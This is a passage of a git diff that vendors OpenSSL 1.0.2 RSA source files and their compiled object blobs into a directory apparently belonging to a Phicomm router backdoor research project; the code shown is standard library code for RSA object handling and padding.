+    const RSA_METHOD *mtmp;
+    mtmp = rsa->meth;
+    if (mtmp->finish)
+        mtmp->finish(rsa);
+#ifndef OPENSSL_NO_ENGINE
+    if (rsa->engine) {
+        ENGINE_finish(rsa->engine);
+        rsa->engine = NULL;
+    }
+#endif
+    rsa->meth = meth;
+    if (meth->init)
+        meth->init(rsa);
+    return 1;
+}
+
+RSA *RSA_new_method(ENGINE *engine)
+{
+    RSA *ret;
+
+    ret = (RSA *)OPENSSL_malloc(sizeof(RSA));
+    if (ret == NULL) {
+        RSAerr(RSA_F_RSA_NEW_METHOD, ERR_R_MALLOC_FAILURE);
+        return NULL;
+    }
+
+    ret->meth = RSA_get_default_method();
+#ifndef OPENSSL_NO_ENGINE
+    if (engine) {
+        if (!ENGINE_init(engine)) {
+            RSAerr(RSA_F_RSA_NEW_METHOD, ERR_R_ENGINE_LIB);
+            OPENSSL_free(ret);
+            return NULL;
+        }
+        ret->engine = engine;
+    } else
+        ret->engine = ENGINE_get_default_RSA();
+    if (ret->engine) {
+        ret->meth = ENGINE_get_RSA(ret->engine);
+        if (!ret->meth) {
+            RSAerr(RSA_F_RSA_NEW_METHOD, ERR_R_ENGINE_LIB);
+            ENGINE_finish(ret->engine);
+            OPENSSL_free(ret);
+            return NULL;
+        }
+    }
+#endif
+
+    ret->pad = 0;
+    ret->version = 0;
+    ret->n = NULL;
+    ret->e = NULL;
+    ret->d = NULL;
+    ret->p = NULL;
+    ret->q = NULL;
+    ret->dmp1 = NULL;
+    ret->dmq1 = NULL;
+    ret->iqmp = NULL;
+    ret->references = 1;
+    ret->_method_mod_n = NULL;
+    ret->_method_mod_p = NULL;
+    ret->_method_mod_q = NULL;
+    ret->blinding = NULL;
+    ret->mt_blinding = NULL;
+    ret->bignum_data = NULL;
+    ret->flags = ret->meth->flags & ~RSA_FLAG_NON_FIPS_ALLOW;
+    if (!CRYPTO_new_ex_data(CRYPTO_EX_INDEX_RSA, ret, &ret->ex_data)) {
+#ifndef OPENSSL_NO_ENGINE
+        if (ret->engine)
+            ENGINE_finish(ret->engine);
+#endif
+        OPENSSL_free(ret);
+        return (NULL);
+    }
+
+    if ((ret->meth->init != NULL) && !ret->meth->init(ret)) {
+#ifndef OPENSSL_NO_ENGINE
+        if (ret->engine)
+            ENGINE_finish(ret->engine);
+#endif
+        CRYPTO_free_ex_data(CRYPTO_EX_INDEX_RSA, ret, &ret->ex_data);
+        OPENSSL_free(ret);
+        ret = NULL;
+    }
+    return (ret);
+}
+
+void RSA_free(RSA *r)
+{
+    int i;
+
+    if (r == NULL)
+        return;
+
+    i = CRYPTO_add(&r->references, -1, CRYPTO_LOCK_RSA);
+#ifdef REF_PRINT
+    REF_PRINT("RSA", r);
+#endif
+    if (i > 0)
+        return;
+#ifdef REF_CHECK
+    if (i < 0) {
+        fprintf(stderr, "RSA_free, bad reference count\n");
+        abort();
+    }
+#endif
+
+    if (r->meth->finish)
+        r->meth->finish(r);
+#ifndef OPENSSL_NO_ENGINE
+    if (r->engine)
+        ENGINE_finish(r->engine);
+#endif
+
+    CRYPTO_free_ex_data(CRYPTO_EX_INDEX_RSA, r, &r->ex_data);
+
+    if (r->n != NULL)
+        BN_clear_free(r->n);
+    if (r->e != NULL)
+        BN_clear_free(r->e);
+    if (r->d != NULL)
+        BN_clear_free(r->d);
+    if (r->p != NULL)
+        BN_clear_free(r->p);
+    if (r->q != NULL)
+        BN_clear_free(r->q);
+    if (r->dmp1 != NULL)
+        BN_clear_free(r->dmp1);
+    if (r->dmq1 != NULL)
+        BN_clear_free(r->dmq1);
+    if (r->iqmp != NULL)
+        BN_clear_free(r->iqmp);
+    if (r->blinding != NULL)
+        BN_BLINDING_free(r->blinding);
+    if (r->mt_blinding != NULL)
+        BN_BLINDING_free(r->mt_blinding);
+    if (r->bignum_data != NULL)
+        OPENSSL_free_locked(r->bignum_data);
+    OPENSSL_free(r);
+}
+
+int RSA_up_ref(RSA *r)
+{
+    int i = CRYPTO_add(&r->references, 1, CRYPTO_LOCK_RSA);
+#ifdef REF_PRINT
+    REF_PRINT("RSA", r);
+#endif
+#ifdef REF_CHECK
+    if (i < 2) {
+        fprintf(stderr, "RSA_up_ref, bad reference count\n");
+        abort();
+    }
+#endif
+    return ((i > 1) ? 1 : 0);
+}
+
+int RSA_get_ex_new_index(long argl, void *argp, CRYPTO_EX_new *new_func,
+                         CRYPTO_EX_dup *dup_func, CRYPTO_EX_free *free_func)
+{
+    return CRYPTO_get_ex_new_index(CRYPTO_EX_INDEX_RSA, argl, argp,
+                                   new_func, dup_func, free_func);
+}
+
+int RSA_set_ex_data(RSA *r, int idx, void *arg)
+{
+    return (CRYPTO_set_ex_data(&r->ex_data, idx, arg));
+}
+
+void *RSA_get_ex_data(const RSA *r, int idx)
+{
+    return (CRYPTO_get_ex_data(&r->ex_data, idx));
+}
+
+int RSA_memory_lock(RSA *r)
+{
+    int i, j, k, off;
+    char *p;
+    BIGNUM *bn, **t[6], *b;
+    BN_ULONG *ul;
+
+    if (r->d == NULL)
+        return (1);
+    t[0] = &r->d;
+    t[1] = &r->p;
+    t[2] = &r->q;
+    t[3] = &r->dmp1;
+    t[4] = &r->dmq1;
+    t[5] = &r->iqmp;
+    k = sizeof(BIGNUM) * 6;
+    off = k / sizeof(BN_ULONG) + 1;
+    j = 1;
+    for (i = 0; i < 6; i++)
+        j += (*t[i])->top;
+    if ((p = OPENSSL_malloc_locked((off + j) * sizeof(BN_ULONG))) == NULL) {
+        RSAerr(RSA_F_RSA_MEMORY_LOCK, ERR_R_MALLOC_FAILURE);
+        return (0);
+    }
+    bn = (BIGNUM *)p;
+    ul = (BN_ULONG *)&(p[off]);
+    for (i = 0; i < 6; i++) {
+        b = *(t[i]);
+        *(t[i]) = &(bn[i]);
+        memcpy((char *)&(bn[i]), (char *)b, sizeof(BIGNUM));
+        bn[i].flags = BN_FLG_STATIC_DATA;
+        bn[i].d = ul;
+        memcpy((char *)ul, b->d, sizeof(BN_ULONG) * b->top);
+        ul += b->top;
+        BN_clear_free(b);
+    }
+
+    /* I should fix this so it can still be done */
+    r->flags &= ~(RSA_FLAG_CACHE_PRIVATE | RSA_FLAG_CACHE_PUBLIC);
+
+    r->bignum_data = p;
+    return (1);
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rsa/rsa_lib.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rsa/rsa_lib.o
new file mode 100644
index 0000000000000000000000000000000000000000..5de00f238b1d1ff3ce51767c51135274c81c1e95
GIT binary patch
literal 5584
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

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rsa/rsa_locl.h b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rsa/rsa_locl.h
new file mode 100644
index 0000000..3e88187
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rsa/rsa_locl.h
@@ -0,0 +1,4 @@
+extern int int_rsa_verify(int dtype, const unsigned char *m,
+                          unsigned int m_len, unsigned char *rm,
+                          size_t *prm_len, const unsigned char *sigbuf,
+                          size_t siglen, RSA *rsa);
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rsa/rsa_none.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rsa/rsa_none.c
new file mode 100644
index 0000000..982b31f
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rsa/rsa_none.c
@@ -0,0 +1,94 @@
+/* crypto/rsa/rsa_none.c */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+
+#include <stdio.h>
+#include "cryptlib.h"
+#include <openssl/bn.h>
+#include <openssl/rsa.h>
+#include <openssl/rand.h>
+
+int RSA_padding_add_none(unsigned char *to, int tlen,
+                         const unsigned char *from, int flen)
+{
+    if (flen > tlen) {
+        RSAerr(RSA_F_RSA_PADDING_ADD_NONE, RSA_R_DATA_TOO_LARGE_FOR_KEY_SIZE);
+        return (0);
+    }
+
+    if (flen < tlen) {
+        RSAerr(RSA_F_RSA_PADDING_ADD_NONE, RSA_R_DATA_TOO_SMALL_FOR_KEY_SIZE);
+        return (0);
+    }
+
+    memcpy(to, from, (unsigned int)flen);
+    return (1);
+}
+
+int RSA_padding_check_none(unsigned char *to, int tlen,
+                           const unsigned char *from, int flen, int num)
+{
+
+    if (flen > tlen) {
+        RSAerr(RSA_F_RSA_PADDING_CHECK_NONE, RSA_R_DATA_TOO_LARGE);
+        return (-1);
+    }
+
+    memset(to, 0, tlen - flen);
+    memcpy(to + tlen - flen, from, flen);
+    return (tlen);
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rsa/rsa_none.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rsa/rsa_none.o
new file mode 100644
index 0000000000000000000000000000000000000000..07dcaf2fb4a1a85d3e0ebdd9e37d31760e6f734a
GIT binary patch
literal 1816
zcmbu8&rcIk5XWaJO4W+hcrZatjfsIMo34`Z<6v4!TWT611w0USv)!)LK)20yn*dQf
zc-os+?;MPOf#HBPT)+!@G5Q~vaKfG-COGr<y|P`Gi%#-(W<KwI=l$GQ>3pV3l0cXQ
z_u)7b6ySU4I8LxI0p}qCtqa!=lhdR7Ymv0lRCYE@?AwdHyyj-Bm~AfN=VLd1eqsZq
zxfhvqzBxM|Xqwjg{1z+W{K6VHr#C7HnRc^^(XlM~`t#BJg!5%9>1<CpUzKLgIhYvu
zgq2$FbNY5pKg7<-f!&;Rkau=l>sydbrN(0YbH#>fH)5mmJvlz83^!P+tlf>v@u2}1
z<2(Sgz9_a+*s>4jpbMZ$Ol<oy#$?iJ0i@-q)EDUqzrh_4zsh<5Qsgte(HFg8#)mk6
zL_XgeeTw`fqr>Qi{iC4%P~eTw+QjNQRUx*UPDWV>PX7%V?>T`7uQ$X_sZ$cc^pa<t
z>@1Moz((ilw_yZ9JdK>{2t7MH5?ggmHLIo}>rj|Usx_@tdTuVL=okhyo1Yp_=GCc8
zW+pwW&L+q6X%*6if?8|Xs$p4Gt3#-l4Sms-Qu#sppwXS5!}j~gwGu%zKaVjA^iEjg
zDUA5I*ayh<m5Qwu(c6~m%ObLjB~7-CWgFy@W@{i9>vfRzYNcYB$jqv3$oM7)>$avZ
z@_fN;$Th24Gc0=rWLCi_tIsU0Vu+>umye;E-lYG<B#@E4bzS>QW4+dg37uKO3o#D!
zCmZMdEPB$4mv)8oTb%RZoC5r4N1cIx{yW%BHUCwwpq6Tibz;a&%zs+|?#2AVk0BSa
zcW8GI3>f<W8U2;?zPuLZ`j{7DEY45hA_g?nukYvjNimRnzy1mGp!*vMxIfYgy|}-i
uxoN5zpMQjV`q$0`=!yC74iUWL8+uHM$9TCmxrkAazRclLd!!rq^?v}p(zss$

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rsa/rsa_null.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rsa/rsa_null.c
new file mode 100644
index 0000000..241b431
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rsa/rsa_null.c
@@ -0,0 +1,155 @@
+/* rsa_null.c */
+/*
+ * Written by Dr Stephen N Henson (steve@openssl.org) for the OpenSSL project
+ * 1999.
+ */
+/* ====================================================================
+ * Copyright (c) 1999 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.OpenSSL.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    licensing@OpenSSL.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.OpenSSL.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+
+#include <stdio.h>
+#include "cryptlib.h"
+#include <openssl/bn.h>
+#include <openssl/rsa.h>
+#include <openssl/rand.h>
+
+/*
+ * This is a dummy RSA implementation that just returns errors when called.
+ * It is designed to allow some RSA functions to work while stopping those
+ * covered by the RSA patent. That is RSA, encryption, decryption, signing
+ * and verify is not allowed but RSA key generation, key checking and other
+ * operations (like storing RSA keys) are permitted.
+ */
+
+static int RSA_null_public_encrypt(int flen, const unsigned char *from,
+                                   unsigned char *to, RSA *rsa, int padding);
+static int RSA_null_private_encrypt(int flen, const unsigned char *from,
+                                    unsigned char *to, RSA *rsa, int padding);
+static int RSA_null_public_decrypt(int flen, const unsigned char *from,
+                                   unsigned char *to, RSA *rsa, int padding);
+static int RSA_null_private_decrypt(int flen, const unsigned char *from,
+                                    unsigned char *to, RSA *rsa, int padding);
+#if 0                           /* not currently used */
+static int RSA_null_mod_exp(const BIGNUM *r0, const BIGNUM *i, RSA *rsa);
+#endif
+static int RSA_null_init(RSA *rsa);
+static int RSA_null_finish(RSA *rsa);
+static RSA_METHOD rsa_null_meth = {
+    "Null RSA",
+    RSA_null_public_encrypt,
+    RSA_null_public_decrypt,
+    RSA_null_private_encrypt,
+    RSA_null_private_decrypt,
+    NULL,
+    NULL,
+    RSA_null_init,
+    RSA_null_finish,
+    0,
+    NULL,
+    NULL,
+    NULL,
+    NULL
+};
+
+const RSA_METHOD *RSA_null_method(void)
+{
+    return (&rsa_null_meth);
+}
+
+static int RSA_null_public_encrypt(int flen, const unsigned char *from,
+                                   unsigned char *to, RSA *rsa, int padding)
+{
+    RSAerr(RSA_F_RSA_NULL_PUBLIC_ENCRYPT, RSA_R_RSA_OPERATIONS_NOT_SUPPORTED);
+    return -1;
+}
+
+static int RSA_null_private_encrypt(int flen, const unsigned char *from,
+                                    unsigned char *to, RSA *rsa, int padding)
+{
+    RSAerr(RSA_F_RSA_NULL_PRIVATE_ENCRYPT,
+           RSA_R_RSA_OPERATIONS_NOT_SUPPORTED);
+    return -1;
+}
+
+static int RSA_null_private_decrypt(int flen, const unsigned char *from,
+                                    unsigned char *to, RSA *rsa, int padding)
+{
+    RSAerr(RSA_F_RSA_NULL_PRIVATE_DECRYPT,
+           RSA_R_RSA_OPERATIONS_NOT_SUPPORTED);
+    return -1;
+}
+
+static int RSA_null_public_decrypt(int flen, const unsigned char *from,
+                                   unsigned char *to, RSA *rsa, int padding)
+{
+    RSAerr(RSA_F_RSA_NULL_PUBLIC_DECRYPT, RSA_R_RSA_OPERATIONS_NOT_SUPPORTED);
+    return -1;
+}
+
+#if 0                           /* not currently used */
+static int RSA_null_mod_exp(BIGNUM *r0, BIGNUM *I, RSA *rsa)
+{
+    ... err(RSA_F_RSA_NULL_MOD_EXP, RSA_R_RSA_OPERATIONS_NOT_SUPPORTED);
+    return -1;
+}
+#endif
+
+static int RSA_null_init(RSA *rsa)
+{
+    return (1);
+}
+
+static int RSA_null_finish(RSA *rsa)
+{
+    return (1);
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rsa/rsa_null.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rsa/rsa_null.o
new file mode 100644
index 0000000000000000000000000000000000000000..8e445c8ee1debb54f4926ed94d563cfef0f53519
GIT binary patch
literal 2968
zcmc(hy-yTT5Wwd+6jTI63nRu{qA?m}a|a}T6y|^&P+WlU(U|D69E+g$vDw=*V2s8u
zY$TyD#%M!fqJ@Peu|N_UZTvedY>bUDCOES@v-f!HNkZc!?`Gz=Gw;p5H*ev7Cfi>Z
zi-AZCu0Yij3h=U_YNvfO4Xw}uKU+@xUZsQ$vPM2WL^G3GPkmW?jMk@m{P~6h9(~@t
zx-I0%&LN9ChdhlAsa7?(v<E|AW2lnPCq~D5$oX$F(ARf4ab{wwQuHc`OGcNG>_}ax
z_-^W6XVOS^pAB$OA#GqQ4tj%up$Vu1SSJ?8L2@Ke5W6!9vH8|mds9Q>GM)$J9Oq~I
zSyOD1?UST4&8^p(8~r&3Yw*b$d_IEHn#;`9HQz96V*M{gtyB*`Hlt$Vk)26<A-l0P
zD~>biLN(MW^GKb?n2Yc453(-i9jHl!XVIp4MtoZ3)6B~nzsvjub6MvZ`Z3tc6u=2B
zdN03k6%v?nC0>0PhkdFW+HsK8LgX89IItD47l+1e{1p;9UtK;Rh~jI=+wjd+I3YZH
zw``e3yog2)@GAPIIai$Xs-EM{-L^d2oVIiBf)nw;F6s{|Q~9}EL_)x~#n0e^<ynwY
z%!2LBf;o^K?(NB%!~OkZnQ?Qxr#G81Au~E^Iu*~fUAN>`Yov@4o%JbxKkBr@IR0z~
zGEjrxtihLR@VCtI-ors0GCyO#lf%75C?`kvh;pP4<&1=n@B~L$3zt4mXk0qzqQ=>U
zw8o{+6U?a=8Y10n2$%WkUXciwdT6gngiHN&uSkT;`#ukF$fcfl8ed@_jPgRkv!+mc
zZlGtya_zijc=o&p#<b;GU`&<EV7Mi6C_H7P(4`=spk?GsIV%rFu2d-4Ma(OfJlnwU
zcSqT?a<|yOQLGq_TXJmITi^-oS#!p<3bs_WYn{MMI@9WxC73E5D0t6W6ve92jt=#7
zT7~5ECrQ5l)RUAeeJA~Nnz{aE{*F9K^!3kU5Y4&U{1oQWoSisSk@fX2rK~SHgGprT
z>-!M7qfUx;Li5w;NA2G#@1OJ`?H`?yzJC+QX#FG(RU9txoC?uq9O~-|Q$t@%pb8^m
zi^%9-KDt+`tZ;rpg=kCtf)~-CP(6R0^H(L1wVwX~dDQ+*azm^8M}Ng6U-~a<ZCYxc
t3;M-%G$U(^$fy3;cJ{~|DhlOmpu%6CF7ywf6_wven~Jg=sPI?M{|mX{BY6M-

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rsa/rsa_oaep.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rsa/rsa_oaep.c
new file mode 100644
index 0000000..9c2a943
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rsa/rsa_oaep.c
@@ -0,0 +1,283 @@
+/* crypto/rsa/rsa_oaep.c */
+/*
+ * Written by Ulf Moeller. This software is distributed on an "AS IS" basis,
+ * WITHOUT WARRANTY OF ANY KIND, either express or implied.
+ */
+
+/* EME-OAEP as defined in RFC 2437 (PKCS #1 v2.0) */
+
+/*
+ * See Victor Shoup, "OAEP reconsidered," Nov. 2000, <URL:
+ * http://www.shoup.net/papers/oaep.ps.Z> for problems with the security
+ * proof for the original OAEP scheme, which EME-OAEP is based on. A new
+ * proof can be found in E. Fujisaki, T. Okamoto, D. Pointcheval, J. Stern,
+ * "RSA-OEAP is Still Alive!", Dec. 2000, <URL:
+ * http://eprint.iacr.org/2000/061/>. The new proof has stronger requirements
+ * for the underlying permutation: "partial-one-wayness" instead of
+ * one-wayness.  For the RSA function, this is an equivalent notion.
+ */
+
+#include "constant_time_locl.h"
+
+#if !defined(OPENSSL_NO_SHA) && !defined(OPENSSL_NO_SHA1)
+# include <stdio.h>
+# include "cryptlib.h"
+# include <openssl/bn.h>
+# include <openssl/rsa.h>
+# include <openssl/evp.h>
+# include <openssl/rand.h>
+# include <openssl/sha.h>
+
+int RSA_padding_add_PKCS1_OAEP(unsigned char *to, int tlen,
+                               const unsigned char *from, int flen,
+                               const unsigned char *param, int plen)
+{
